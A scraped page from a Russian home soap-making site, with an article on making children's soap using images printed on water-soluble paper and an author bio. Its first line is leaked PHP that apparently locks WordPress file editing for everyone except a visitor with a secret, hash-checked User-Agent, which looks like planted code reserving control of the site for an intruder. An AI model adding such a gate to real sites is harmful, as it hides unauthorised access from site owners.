if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } 11 видеоидей как сделать мыло для детей | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

11 видеоидей как сделать мыло для детей

Мыловарение в домашних условиях давно вышло за рамки простого хобби и представляет собой не что иное как искусство! Все чаще домашние мыловары изготавливают эксклюзивные авторские мыла не для собственного использования, но и для детей

Мыло­ва­ре­ние в домаш­них усло­ви­ях дав­но вышло за рам­ки про­сто­го хоб­би и пред­став­ля­ет собой не что иное как искус­ство! Все чаще домаш­ние мыло­ва­ры изго­тав­ли­ва­ют экс­клю­зив­ные автор­ские мыла не для соб­ствен­но­го исполь­зо­ва­ния, но и для детей.

Что­бы создать дет­ское мыло с кар­тин­кой или фото, сле­ду­ет обза­ве­стись водо­рас­тво­ри­мой бума­гой. Такую бума­гу мож­но при­об­ре­сти в мага­зине для мыло­ва­ров, а рас­пе­ча­ты­вать изоб­ра­же­ния на водо­рас­тво­ри­мых листах луч­ше все­го с помо­щью лазер­но­го прин­те­ра. Кар­тин­ки для буду­ще­го мыла нуж­но, преж­де все­го, акку­рат­но выре­зать по кон­ту­ру и поме­стить меж­ду мыль­ны­ми сло­я­ми, пред­ва­ри­тель­но смо­чив бума­гу с двух сто­рон спир­том. Сле­ду­ет обра­тить вни­ма­ние на то, что неже­ла­тель­но рас­по­ла­гать изоб­ра­же­ние слиш­ком близ­ко к краю одно­го из сло­ев, ина­че кар­тин­ка может быст­ро исчез­нуть с поверх­но­сти мыла.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!